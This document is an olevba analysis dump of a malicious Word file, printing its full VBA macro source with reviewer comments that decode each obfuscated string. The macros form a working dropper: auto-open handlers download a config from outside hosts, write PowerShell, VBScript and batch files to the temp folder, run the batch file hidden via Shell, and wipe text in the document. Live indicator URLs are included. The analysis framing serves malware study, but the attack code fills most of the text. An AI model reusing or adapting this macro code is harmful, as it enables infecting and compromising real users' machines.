- olevba 0.25 - http://decalage.info/python/oletools
- Flags Filename
- ----------- -----------------------------------------------------------------
- OLE:MAS-HB- edcsrp~1.doc
- (Flags: OpX=OpenXML, XML=Word2003XML, M=Macros, A=Auto-executable, S=Suspicious keywords, I=IOCs, H=Hex strings, B=Base64 strings, D=Dridex strings, ?=Unknown)
- ===============================================================================
- FILE: edcsrp~1.doc
- Type: OLE
- -------------------------------------------------------------------------------
- VBA MACRO ThisDocument.cls
- in file: edcsrp~1.doc - OLE stream: u'Macros/VBA/ThisDocument'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ' Empty stub. The "_Open" suffix imitates an event handler, but nothing in
- ' this listing calls it; it only pads the module.
- Sub ZJhcjkhjwqhdjqw_Open()
- End Sub
- ' Second empty "_Open" stub; never called from the code shown here.
- Sub Huqwhdkqwhdjkqw_Open()
- End Sub
- ' Excel-style auto-exec entry point (also reached from Workbook_Open).
- ' Hands straight off to Zjdihquhwqid, which runs the dropper Ynqhbdjhqwb.
- Sub Auto_Open()
- Zjdihquhwqid
- End Sub
- ' Trampoline shared by every auto-exec entry point (Auto_Open, AutoOpen,
- ' Workbook_Open). The string assignment is dead filler; the only effect
- ' is the call into Ynqhbdjhqwb.
- Sub Zjdihquhwqid()
- HYQDUGWQ = "nj21he jg2hj21ge"
- Ynqhbdjhqwb
- End Sub
- ' Dead code: assigns a junk string and is not called anywhere in this dump.
- Sub Giqjwdhqwkjq()
- BHBDJHWQ = "behj21ghj12"
- End Sub
- ' Word auto-exec entry point: runs when the document is opened with macros
- ' enabled. The string is filler; Zjdihquhwqid leads to the dropper.
- Sub AutoOpen()
- JAHSDJGHQW = "jr3 2jhjk2gr2"
- Zjdihquhwqid
- End Sub
- ' Excel workbook auto-exec entry point; chains to Auto_Open so the same
- ' dropper runs whichever host application opens the file.
- Sub Workbook_Open()
- LJKLJWDKLQ = "bhjgwqhjdgqj "
- Auto_Open
- End Sub
- ' Main dropper routine, reached from Auto_Open / AutoOpen / Workbook_Open
- ' through Zjdihquhwqid. Every string is assembled from Chr(), split
- ' literals and Sgn() arithmetic; the decoded value is noted beside each
- ' assignment below.
- '
- ' What it does, in order:
- '   1. Builds %TEMP%\<random stem>.ps1 / .vbs / .bat paths.
- '   2. GETs a base64 config (78672738612836.txt) from phudge.ca, falling
- '      back to kedros.ch, decodes it (Quqhwdbyas) and slices out the
- '      <text10>..<text31> and <stext1>..<stext3> sections (Port).
- '   3. GETs fafa.txt from the same host into SEXX.
- '   4. Chooses a branch on whether %USERPROFILE% contains "sers\"
- '      (hudhw = 200) or not (hudhw = 130), writes the scripts into %TEMP%
- '      seeded with the downloaded sections and the constants below, and
- '      launches the .bat hidden through Module3.HowEver (Shell, style 0).
- '   5. Calls Module3.India to delete / recolour text between <object> and
- '      <module> marker tags in the document body.
- '
- ' Network and file indicators visible in this routine:
- '   http://phudge.ca/wordpress/wp-content/themes/canvas/includes/.svn/props/{78672738612836.txt,fafa.txt}
- '   http://kedros.ch/modules/mod_araticlhess/{78672738612836.txt,fafa.txt}
- '   http://savepic.su/5751812.jpg   (STAR1, written into the .vbs, 130 branch)
- '   http://savepic.su/5757956.jpg   (MSTAR2, written into the .ps1 as $stat)
- '   %TEMP%\<stem>.ps1, %TEMP%\<stem>.vbs, %TEMP%\<stem>.bat, drop name "8.exe"
- ' The only transport is MSXML2.ServerXMLHTTP (Module2.Linolium) and the only
- ' execution primitive is Shell (Module3.HowEver).
- Sub Ynqhbdjhqwb()
- Dim fallout As Integer, silkroad As Integer, inclife As Integer, inredible As Integer
- Dim retVal As Variant, gana As Integer, turkey As Integer, malay As Integer, SPAIN As String, BOLIVIA As String
- ' ---- path construction --------------------------------------------------
- ' BOLIVIA = "\"
- BOLIVIA = Chr(90 + 2)
- ' ANGOLA = pseudo-random integer in [10000, 26136] as a string (Ubqhwdhwqbd);
- ' it becomes the stem of every dropped file name.
- ANGOLA = Ubqhwdhwqbd(16137) + ""
- ' SPAIN = "Temp"
- SPAIN = Chr(84) & "em" + "p"
- QHDQUWH = ANGOLA
- ' FL2 = the random stem
- FL2 = QHDQUWH
- ' PH2 = Environ("Temp") & "\"
- PH2 = Module2.Goabc(SPAIN) + BOLIVIA
- silkroad = 9
- jwnqdw = -1
- BOSNIA = 8719723
- ' BOSNIA = 1 + 1 + 113 + Sgn(-1) = 114 (the previous assignment is overwritten)
- BOSNIA = 1 + 1 + 113 + Sgn(jwnqdw)
- BALAGAN = BOSNIA
- JWIDJIAAA = ""
- QIWJDABB = "b"
- ' HUYFEA = "bat"
- HUYFEA = QIWJDABB + "a" + "t"
- ' PSFL = FL2 & ".ps1"   (Chr(115) = "s", Chr(49) = "1")
- PSFL = FL2 + "" & "" + "." + "p" + "" + Chr(115) + Chr(49)
- ' gana = Sgn(1 - 300 * Sin(20)); Sin(20 rad) is about 0.91, so gana = -1
- gana = NUqwdqwbdsad(1 - 300 * Sin(20))
- ' SSS = Chr(114 + 2 - 1) = "s"
- SSS = Chr(BALAGAN + 2 + gana)
- ' VBFL = FL2 & ".vbs"   (Chr(46) = ".")
- VBFL = FL2 + Chr(50 - 4) + "v" + "" + "" & "b" & "" & SSS & ""
- ' BAFL = FL2 & ".bat": Sgn(Fix(-22.043)) = -1, so -1 + 31 - 10 + 25 - 1 + 2 = 46 = "."
- BAFL = FL2 + Chr(NUqwdqwbdsad(Fix(-22.043)) + 31 - 10 + 25 + gana + 2) + HUYFEA
- ' INTG = "object"; KIWD = "odule"; AFTG = "module" -- the marker tags passed
- ' to Module3.India at the end of this routine.
- INTG = "" & "o" & "bject"
- KIWD = Chr(110 + NUqwdqwbdsad(Len(BAFL))) + "dule"
- AFTG = Chr(109) & KIWD
- ' SXE = ".exe"
- SXEE = Chr(46)
- SXAA = Chr(101)
- SXE = SXEE & SXAA & "" & "xe"
- ' GNG = ".jpg"   (2 ^ 2 + 42 = 46)
- GNG = Chr(2 ^ 2 + 42) + "jpg"
- ' HUQD = "/"
- HUQD = Chr(30 + 16 + 1)
- ' ATTH = "http://"
- ATTH = "ht" & "t" & "" & "p" & ":" & "//"
- ' BQHJDQ = "savepic.su/"
- BQHJDQ = "sa" + "vep" + "ic" & Chr(46) & "su" + HUQD
- ' PSPTH = %TEMP%\<stem>.ps1, VBPTH = %TEMP%\<stem>.vbs, BAPTH = %TEMP%\<stem>.bat
- ' (the junk literal first assigned to BAPTH is immediately replaced)
- PSPTH = PH2 + PSFL
- VBPTH = PH2 + VBFL
- BAPTH = "1jh2ekh12kehk12he j12g e21"
- ABPTH = PH2 + BAFL
- BAPTH = ABPTH
- JHQKWDQAASS = BQHJDQ
- ' File numbers used by the Open ... For Output As # statements below.
- Dim BALAGANHUQW As Integer, DRT As Integer, BFT As Integer, CFT As Integer, DFT As Integer, EFT As Integer, CONT As String
- DRT = 315
- BFT = 316
- CFT = 317
- DFT = 318
- EFT = 319
- Dim NUWDHUQHUQWDH As String
- ' NUWDHUQHUQWDH = "USERPROFILE"
- NUWDHUQHUQWDH = "" + "USE" & "RPROFILE"
- ' ---- stage 1: download and decode the config ----------------------------
- Dim PBIn As String, asdwq As String, MIWDWQ As String
- ' TSTS = ".txt"; CDDD = "78672738612836.txt"; LNSS = "fafa.txt"
- TSTS = "." + "tx" + "t"
- CDDD = "78672738612836" + TSTS
- LNSS = "f" & "a" & "f" & "a" & "" + TSTS
- ' Primary host path and fallback host path (both look like paths inside
- ' third-party CMS installs; whether they are compromised sites is inferred).
- STT1 = "phudge.ca/w" + "ordp" + "ress/w" + "p-con" + "tent/themes/can" + "vas/inc" + "ludes/.svn/props/"
- STT2 = "kedros.ch/mod" + "ules/m" + "od_ara" + "ticlhess/"
- ' PBIn = http://phudge.ca/.../78672738612836.txt
- PBIn = ATTH + STT1 + CDDD
- ' Synchronous HTTP GET via MSXML2.ServerXMLHTTP (Module2.Linolium);
- ' no status check, CONT is whatever responseText came back.
- CONT = Module2.Linolium(PBIn)
- ' asdwq = last character of the response (Rasdas = Right(a, 1))
- asdwq = Rasdas(CONT)
- HQUWDAAA = "0"
- ' Fallback: when the primary response does not end in "=" (base64
- ' padding), fetch the same file from kedros.ch and use the whole body.
- ' NOTE(review): on the primary path only the single "=" character in
- ' asdwq reaches the decoder (CONT itself is never copied into asdwq), so
- ' as written the first host cannot produce a usable config; the fallback
- ' path is the one that works. Possibly a bug carried over in the sample.
- If (asdwq <> "=") Then
- PBIn = ATTH + STT2 + CDDD
- CONT = Module2.Linolium(PBIn)
- asdwq = CONT
- HQUWDAAA = "1"
- End If
- ' Base64 decode through MSXML2.DOMDocument (Quqhwdbyas)
- CONT = Quqhwdbyas(asdwq)
- Dim ahuywdgqy As String
- ' Slice the tagged sections out of the decoded config; they become the
- ' bodies of the scripts written below (Port returns the text between
- ' <tag> and </tag>). Their contents are not present in this dump.
- TVT10 = Port(CONT, "t" & "ext10")
- TVT20 = Port(CONT, "t" & "ext20")
- TVT21 = Port(CONT, "t" & "ext21")
- TVT30 = Port(CONT, "t" & "ext30")
- TVT31 = Port(CONT, "t" & "ext31")
- XPT1 = Port(CONT, "stext1")
- XPT2 = Port(CONT, "stext2")
- XPT3 = Port(CONT, "stext3")
- ' ---- environment check --------------------------------------------------
- ' WVR = Environ("USERPROFILE"); hufehu1 <> 0 when that path contains
- ' "sers\" (a C:\Users\... profile, i.e. a modern Windows layout).
- WVR = Module2.Goabc(NUWDHUQHUQWDH)
- hufehu1 = InStr(WVR, "sers\")
- Dim hudhw As Integer
- Dim ghdAdd(1 To 3)
- ghdAdd(1) = "1"
- ghdAdd(2) = "0"
- ghdAdd(3) = "0"
- If (hufehu1 <> 0) Then
- ghdAdd(1) = "2"
- Else
- ghdAdd(2) = "3"
- End If
- ' Join yields "2 0 0" or "1 3 0"; Val() skips blanks, so hudhw is 200 for
- ' a ...Users\ profile and 130 otherwise. The two branches below key off
- ' exactly those constants.
- JHWQUD = Join(ghdAdd)
- hudhw = Val(JHWQUD)
- ' One-second busy-wait (Module2.Crispy)
- Module2.Crispy (1)
- ' ---- stage 2: download fafa.txt from whichever host was used -------------
- MIWDWQ = ATTH + STT1 + LNSS
- If (HQUWDAAA = "1") Then
- MIWDWQ = ATTH + STT2 + LNSS
- End If
- ' SEXX = raw body of fafa.txt; it is embedded verbatim into the dropped
- ' .vbs (strRT) or .ps1 ($ggtt). Presumably a payload URL -- not confirmed
- ' from this listing.
- SEXX = Module2.Linolium(MIWDWQ)
- ' PSTB is assigned but never used.
- PSTB = PBIn + "123123123"
- ' STAR1 = http://savepic.su/5751812.jpg, STAR2 = http://savepic.su/5757956.jpg
- MSTAR1 = JHQKWDQAASS + "5751812" + GNG
- MSTAR2 = JHQKWDQAASS + "5757956" + GNG
- STAR1 = ATTH + MSTAR1
- STAR2 = ATTH + MSTAR2
- ' FF = "8.exe"
- FFQ = "8"
- FF = FFQ + SXE
- ' ---- branch A (hudhw = 130): .bat + .vbs ---------------------------------
- If (hudhw = 130) Then
- ' %TEMP%\<stem>.bat: <stext1>, a label, then three "set" lines handing
- ' the script the temp dir (trfd), the stem (nmsj) and "8" (exds), then <stext2>.
- Open BAPTH For Output As #DRT
- Print #DRT, XPT1
- Print #DRT, ":jadkjasghdjasg" & vbCrLf & "set trfd=" + Chr(34) + PH2 + Chr(34)
- Print #DRT, "set nmsj=" + Chr(34) + FL2 + Chr(34)
- Print #DRT, "set exds=" + Chr(34) + FFQ + Chr(34)
- Print #DRT, XPT2
- Close #DRT
- Module2.Crispy (1)
- ' %TEMP%\<stem>.vbs: strRT = fafa.txt body, statRT = savepic URL #1,
- ' jfeuygq = "8.exe", strTecation = "%TEMP%\"+jfeuygq, then <stext3>.
- Open VBPTH For Output As #BFT
- Print #BFT, "strRT = " + Chr(34) + SEXX + Chr(34)
- Print #BFT, "statRT = " + Chr(34) + STAR1 + Chr(34)
- Print #BFT, "" & "jfeu" & "ygq = " + Chr(34) & "" + FF + Chr(34) & ""
- Print #BFT, "strTecation = " + Chr(34) + PH2 + Chr(34) + "+jfeuygq"
- Print #BFT, XPT3
- Close #BFT
- ' NOTE(review): no module named BDDT appears in this olevba dump (only
- ' ThisDocument and Module1-3). With no error handler in scope this call
- ' would raise before the Shell below, unless BDDT exists in a stream that
- ' is not shown here.
- BDDT.Crispy (1)
- ' Shell(BAPTH, 0): run the .bat with a hidden window
- NTH1 = Module3.HowEver(retVal, BAPTH)
- End If
- HUDQG = "';"
- ' ---- branch B (hudhw = 200): .ps1 + .vbs + .bat ---------------------------
- If (hudhw = 200) Then
- ZPQSKD = FL2
- ' %TEMP%\<stem>.ps1: two junk variables, $stat = savepic URL #2,
- ' $ggtt = fafa.txt body, $pths = %TEMP%\, $wehs = stem, $nnm = "8",
- ' followed by the <text10> section.
- Open PSPTH For Output As #CFT
- Print #CFT, "$bhjdgqwdg = 'qbwdjhqbwgd';"
- Print #CFT, "$bqhdwjqwdd = 'njqdhjqwdqj';"
- Print #CFT, "$stat = 'ht'+'tp://'+''+'" + MSTAR2 + "';"
- Print #CFT, "$ggtt = '" + SEXX + "';"
- Print #CFT, "$pths = '" + PH2 + HUDQG
- Print #CFT, "$wehs = '" + ZPQSKD + HUDQG
- Print #CFT, "$nnm = '" + FFQ + "';"
- Print #CFT, TVT10
- Close #CFT
- ' %TEMP%\<stem>.vbs: <text30>, currentFile = "%TEMP%\"&"<stem>"&huih, <text31>
- Open VBPTH For Output As #DFT
- Print #DFT, TVT30
- Print #DFT, "c" + "urrentFile = " + Chr(34) + PH2 + Chr(34) + "&" + Chr(34) + FL2 + Chr(34) + "&huih"
- Print #DFT, TVT31
- Close #DFT
- ' %TEMP%\<stem>.bat: "@echo off" (Chr(64) = "@"), a label, <text20>,
- ' set Ads3=<stem>, set Mts4=%TEMP%\, set Rts4=%Mts4%%Ads3%, <text21>.
- ' Only the .bat is launched; how it reaches the .ps1/.vbs is inside the
- ' downloaded sections, which are not shown here.
- Open BAPTH For Output As #EFT
- Print #EFT, Chr(30 + 30 + 4) + "echo off" & vbCrLf & ":jqduqihdjsakd"
- Print #EFT, TVT20
- Print #EFT, "set Ads3=" + Chr(34) + FL2 + Chr(34)
- Print #EFT, ":hdjqkwhdqhwd"
- Print #EFT, "set Mts4=" + Chr(34) + PH2 + Chr(34)
- Print #EFT, ":ajhsdkasghjgsd"
- Print #EFT, "set Rts4=" + "%Mts4%%Ads3%"
- Print #EFT, TVT21
- Close #EFT
- Module2.Crispy (1)
- ' Shell(BAPTH, 0): run the .bat with a hidden window
- NTH2 = Module3.HowEver(retVal, BAPTH)
- End If
- ' ---- document clean-up --------------------------------------------------
- ' JUW = "/", AKK = "<", ZKK = ">" build "<object>", "</object>", "<module>"
- ' and "</module>". India(c=1) deletes the document text between the
- ' <object> markers, India(c=2) sets the text between the <module> markers
- ' to black, and the c=3 calls are meant to replace each marker with a
- ' space. Note that India's c=3 branch assigns .Text = a, a name it does
- ' not declare, so those four calls may not do what was intended.
- JUW = Chr(47)
- AKK = Chr(60)
- ZKK = ">"
- NTH3 = Module3.India(AKK + INTG + ZKK, AKK & JUW + INTG + ZKK, 1)
- NTH4 = Module3.India(AKK + AFTG + ZKK, AKK + JUW + AFTG + ZKK, 2)
- NTH5 = Module3.India(AKK + INTG + ZKK, "", 3)
- NTH6 = Module3.India(AKK + JUW + INTG + ZKK, "", 3)
- NTH7 = Module3.India(AKK + AFTG + ZKK, "", 3)
- NTH8 = Module3.India(AKK + JUW + AFTG + ZKK, "", 3)
- End Sub
- ' Sgn() wrapper. Because a is declared Integer, the Double expressions the
- ' caller passes (e.g. 1 - 300 * Sin(20)) are rounded to an Integer first;
- ' the result (-1, 0 or 1) feeds the Chr() arithmetic in Ynqhbdjhqwb.
- Public Function NUqwdqwbdsad(a As Integer)
- NUqwdqwbdsad = Sgn(a)
- End Function
- ' Duplicate Sgn() wrapper (same body as NUqwdqwbdsad); used by Quqhwdbyas
- ' to turn Tan(12) into the -1 that completes the "MSXML2.DOMDocument" ProgID.
- Public Function Hhqudhqwgyuqwaaa(a As Integer)
- Hhqudhqwgyuqwaaa = Sgn(a)
- End Function
- ' Returns CStr(Int(a * Rnd + 10000)): a pseudo-random integer in
- ' [10000, 10000 + a - 1], used as the stem of the dropped file names.
- ' NOTE(review): no Randomize call appears in any stream shown, so the
- ' Rnd sequence -- and hence the file names -- may repeat between runs.
- Public Function Ubqhwdhwqbd(a As Integer)
- Ubqhwdhwqbd = CStr(Int((a * Rnd) + 10000))
- End Function
- ' Base64 decoder built on MSXML2.DOMDocument: a throwaway element whose
- ' DataType is "bin.base64" converts .Text (the encoded data) into
- ' .nodeTypedValue (a Byte array), which is returned coerced to String.
- ' Tan(12 rad) is about -0.64 and rounds to the Integer -1, so QHDHUQW is
- ' Chr(77) & "SXML2.DOMDocument" = "MSXML2.DOMDocument".
- ' The objNodeS/E/Q/Z assignments are filler.
- ' NOTE(review): assigning a Byte array to a String copies the bytes as
- ' raw UTF-16 code units, so the plaintext served by the C2 is presumably
- ' UTF-16LE; confirm against a captured config before reusing the <tag>
- ' offsets from Port.
- Public Function Quqhwdbyas(ByVal strData As String) As String
- Dim objXML As Object
- Dim objNode As Object
- Dim asduiwhqdqiw As Integer, nudqwd As Integer, sshquwdq As Integer
- nudqwd = Tan(12)
- 'MsgBox ("tangens:" + nudqwd)
- asduiwhqdqiw = Hhqudhqwgyuqwaaa(nudqwd)
- QHDHUQW = "" & Chr(78 + asduiwhqdqiw) + "SXML2.DOMDocument"
- Set objXML = CreateObject(QHDHUQW)
- Set objNode = objXML.createElement("b6" + "4")
- objNodeS = "j1h2 ehgj12hj12 ejg12e1"
- objNodeE = "g21eh1"
- objNodeQ = "1j2ge h12"
- objNodeZ = "dbjsahs "
- ' "bin.base64"
- objNode.DataType = "bin.b" + Chr(97) + "se" + "6" & "4"
- objNode.Text = strData
- WUDHA = objNode.nodeTypedValue
- Quqhwdbyas = WUDHA
- Set objNode = Nothing
- Set objXML = Nothing
- End Function
- ' Returns the text between "<" & b & ">" and "</" & b & ">" in a.
- ' UQWD = Chr(60) = "<" and NDUW = Chr(62) = ">". The hard-coded +8 is the
- ' length of the opening tag for a six-character tag name, which holds for
- ' every tag the caller uses (text10..text31, stext1..stext3); any other
- ' length would mis-slice the result.
- ' NOTE(review): there is no presence check -- if either tag is missing,
- ' InStr returns 0, tent goes negative and Mid$ raises a runtime error.
- Public Function Port(a, b As String)
- Dim krd, tent As Integer
- UQWD = Chr(50 + 8 + 2) & ""
- NDUW = "" & Chr(70 - 8)
- krd = InStr(1, a, UQWD + b + NDUW) + 8
- tent = InStr(1, a, UQWD + "/" + b + NDUW) - krd
- KLMN = Mid$(a, krd, tent)
- HUQHWDA = KLMN
- Port = HUQHWDA
- End Function
- ' Returns the last character of a; used by Ynqhbdjhqwb to test whether a
- ' downloaded response ends in base64 "=" padding. Static only affects
- ' retention of locals between calls and has no effect here.
- Private Static Function Rasdas(a As String)
- Rasdas = Right(a, 1)
- End Function
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ANALYSIS:
- +------------+----------------+-----------------------------------------+
- | Type | Keyword | Description |
- +------------+----------------+-----------------------------------------+
- | AutoExec | AutoOpen | Runs when the Word document is opened |
- | AutoExec | Auto_Open | Runs when the Excel Workbook is opened |
- | AutoExec | Workbook_Open | Runs when the Excel Workbook is opened |
- | Suspicious | CreateObject | May create an OLE object |
- | Suspicious | Open | May open a file |
- | Suspicious | Output | May write to a file (if combined with |
- | | | Open) |
- | Suspicious | Print # | May write to a file (if combined with |
- | | | Open) |
- | Suspicious | Chr | May attempt to obfuscate specific |
- | | | strings |
- | Suspicious | Hex Strings | Hex-encoded strings were detected, may |
- | | | be used to obfuscate strings (option |
- | | | --decode to see all) |
- | Suspicious | Base64 Strings | Base64-encoded strings were detected, |
- | | | may be used to obfuscate strings |
- | | | (option --decode to see all) |
- +------------+----------------+-----------------------------------------+
- -------------------------------------------------------------------------------
- VBA MACRO Module1.bas
- in file: edcsrp~1.doc - OLE stream: u'Macros/VBA/Module1'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ' Returns a.responseText. The only caller in this dump is Module2.Linolium,
- ' which passes the MSXML2.ServerXMLHTTP object after Send. Split into its
- ' own module so the "responseText" member is not next to the CreateObject.
- Public Function Xjdkhjfwefw(a As Object)
- Xjdkhjfwefw = (a.responseText)
- End Function
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ANALYSIS:
- No suspicious keyword or IOC found.
- -------------------------------------------------------------------------------
- VBA MACRO Module2.bas
- in file: edcsrp~1.doc - OLE stream: u'Macros/VBA/Module2'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ' Thin wrapper around Environ(sps); the three identical assignments are
- ' filler. Called with "Temp" and "USERPROFILE" from ThisDocument.
- Public Function Goabc(sps As String)
- NJBHVGASVD = "h1j2 hjeg1hj12geh 1221ek l12j12e"
- NJBHVGASVD = "h1j2 hjeg1hj12geh 1221ek l12j12e"
- NJBHVGASVD = "h1j2 hjeg1hj12geh 1221ek l12j12e"
- Goabc = Environ(sps)
- End Function
- ' HTTP GET wrapper. Tan(12 rad) is about -0.64 and rounds to the Integer
- ' -1, so the ProgID is "MS" & Chr(88) & "ML2.ServerXMLH" & Chr(84) & Chr(84)
- ' & Chr(80) = "MSXML2.ServerXMLHTTP". The request is synchronous (no
- ' async argument to Open), the body AHUDWQI is an empty String, and
- ' responseText is returned with no status check -- callers get whatever
- ' the server or an intercepting proxy returned. ServerXMLHTTP does not
- ' use the WinINet/IE proxy settings, which matters when reproducing this
- ' in a lab.
- Public Function Linolium(nbqjbdjqw As String)
- Dim dhjqwqkjww As Integer, aaqjwhdq As Integer, Kjqiwdhqwuhdjqkwhdjkqwbd As Object, AHUDWQI As String
- Dim ashdUHhda As String, hausd As Integer
- ashdUHhda = nbqjbdjqw
- hausd = Tan(12)
- BQDHJQWDGWQJGS = "MS" + Chr(93 + 5 * hausd) + "ML2.ServerXMLH" & Chr(85 + hausd) & Chr(84) & Chr(80)
- 'MsgBox (BQDHJQWDGWQJGS)
- Set Kjqiwdhqwuhdjqkwhdjkqwbd = CreateObject(BQDHJQWDGWQJGS)
- Kjqiwdhqwuhdjqkwhdjkqwbd.Open "GE" & "" & "T", ashdUHhda
- Kjqiwdhqwuhdjqkwhdjkqwbd.Send (AHUDWQI)
- Linolium = Module1.Xjdkhjfwefw(Kjqiwdhqwuhdjqkwhdjkqwbd)
- End Function
- ' Busy-wait for NumOfSeconds, pumping DoEvents so Word stays responsive.
- ' Always called with 1 from ThisDocument, between the downloads, file
- ' writes and the Shell call. Timer is seconds since midnight, so a wait
- ' that straddles midnight is wrong (it runs until the same clock value
- ' the next day).
- Sub Crispy(NumOfSeconds As Long)
- Dim SngSec As Long
- SngSec = Timer + NumOfSeconds
- Do While Timer < SngSec
- DoEvents
- Loop
- End Sub
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ANALYSIS:
- +------------+--------------+-----------------------------------------+
- | Type | Keyword | Description |
- +------------+--------------+-----------------------------------------+
- | Suspicious | CreateObject | May create an OLE object |
- | Suspicious | Open | May open a file |
- | Suspicious | Environ | May read system environment variables |
- | Suspicious | Chr | May attempt to obfuscate specific |
- | | | strings |
- +------------+--------------+-----------------------------------------+
- -------------------------------------------------------------------------------
- VBA MACRO Module3.bas
- in file: edcsrp~1.doc - OLE stream: u'Macros/VBA/Module3'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ' Finds marker dnuwhd, then marker b after it, in the active document and
- ' acts on the range between them depending on c:
- '   c = 1: delete that range
- '   c = 2: set its font colour to black (suggesting the text was hidden
- '          in another colour -- inferred, not shown here)
- '   c = 3: replace every occurrence of the marker with a space
- '          (QHUDW = Chr(10 + 23 + Sgn(1 - 2 ^ 4)) = Chr(32)).
- ' Callers in ThisDocument pass "<object>"/"</object>" and
- ' "<module>"/"</module>". The BYHQGDJHWQ assignments and the commented
- ' copies of them are filler.
- ' NOTE(review): the c = 3 branch sets .Text = a, but the first parameter
- ' is named dnuwhd and no a is declared in this module; with no Option
- ' Explicit visible this searches for an empty string, so the four c = 3
- ' calls probably leave the markers in place.
- Public Function India(dnuwhd As String, b As String, c As Integer)
- Dim selectedText As String
- Dim ssjidoqwhduqhwidqwudihq As Range, lesleslesqjhdjqkwhdwq As Range
- Set ssjidoqwhduqhwidqwudihq = ActiveDocument.Range
- BYHQGDJHWQ = "KH21E JK12GJFHE G21HFEGH12F fghf eghewf jhg hjsgfhjghj3g j12"
- BYHQGDJHWQ = "KH21E JK12GJFHE G21HFEGH12F fghf eghewf jhg hjsgfhjghj3g j12"
- With ssjidoqwhduqhwidqwudihq.Find
- 'BYHQGDJHWQ = "KH21E JK12GJFHE G21HFEGH12F fghf eghewf jhg hjsgfhjghj3g j12"
- 'BYHQGDJHWQ = "KH21E JK12GJFHE G21HFEGH12F fghf eghewf jhg hjsgfhjghj3g j12"
- ' First marker: find it and collapse the search range to just after it.
- .Text = dnuwhd
- .MatchWholeWord = True
- ssjidoqwhduqhwidqwudihq.Find.Execute
- ssjidoqwhduqhwidqwudihq.Collapse direction:=wdCollapseEnd
- Dim wdwq As String
- Set lesleslesqjhdjqkwhdwq = ActiveDocument.Range
- Dim wdsadwq As String
- ' The working range starts where the first marker ended ...
- lesleslesqjhdjqkwhdwq.Start = ssjidoqwhduqhwidqwudihq.End
- ' ... and ends where the second marker begins.
- .Text = b
- .MatchWholeWord = True
- .Execute
- BYHQGDJHWQ = "KH21E JK12GJFHE G21HFEGH12F fghf eghewf jhg hjsgfhjghj3g j12"
- BYHQGDJHWQ = "KH21E JK12GJFHE G21HFEGH12F fghf eghewf jhg hjsgfhjghj3g j12"
- ssjidoqwhduqhwidqwudihq.Collapse direction:=wdCollapseStart
- lesleslesqjhdjqkwhdwq.End = ssjidoqwhduqhwidqwudihq.Start
- If (c = 1) Then
- selectedText = lesleslesqjhdjqkwhdwq.Delete
- End If
- If (c = 2) Then
- lesleslesqjhdjqkwhdwq.Font.Color = wdColorBlack
- End If
- Dim hduwaa As Integer
- ' hduwaa = -15, so QHUDW = Chr(33 - 1) = " "
- hduwaa = 1 - 2 ^ 4
- QHUDW = Chr(10 + 23 + Sgn(hduwaa))
- If (c = 3) Then
- With ssjidoqwhduqhwidqwudihq.Find
- .Text = a
- .Replacement.Text = QHUDW
- 'BYHQGDJHWQ = "KH21E JK12GJFHE G21HFEGH12F fghf eghewf jhg hjsgfhjghj3g j12"
- 'BYHQGDJHWQ = "KH21E JK12GJFHE G21HFEGH12F fghf eghewf jhg hjsgfhjghj3g j12"
- 'BYHQGDJHWQ = "KH21E JK12GJFHE G21HFEGH12F fghf eghewf jhg hjsgfhjghj3g j12"
- 'BYHQGDJHWQ = "KH21E JK12GJFHE G21HFEGH12F fghf eghewf jhg hjsgfhjghj3g j12"
- .Wrap = wdFindContinue
- .Execute Replace:=wdReplaceAll
- End With
- End If
- End With
- End Function
- ' Execution primitive: Shell(hasdgja, 0) runs the command with window
- ' style 0 (vbHide). The task id is stored in the ByRef Variant hqwdugqw
- ' and also returned. ThisDocument calls it with the dropped .bat path.
- ' The string assignment is filler.
- Public Function HowEver(hqwdugqw As Variant, hasdgja)
- BHQJGDWQ = "1b2hej g1h2e21j"
- hqwdugqw = Shell(hasdgja, 0)
- HowEver = hqwdugqw
- End Function
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ANALYSIS:
- +------------+---------+-----------------------------------------+
- | Type | Keyword | Description |
- +------------+---------+-----------------------------------------+
- | Suspicious | Shell | May run an executable file or a system |
- | | | command |
- | Suspicious | Chr | May attempt to obfuscate specific |
- | | | strings |
- +------------+---------+-----------------------------------------+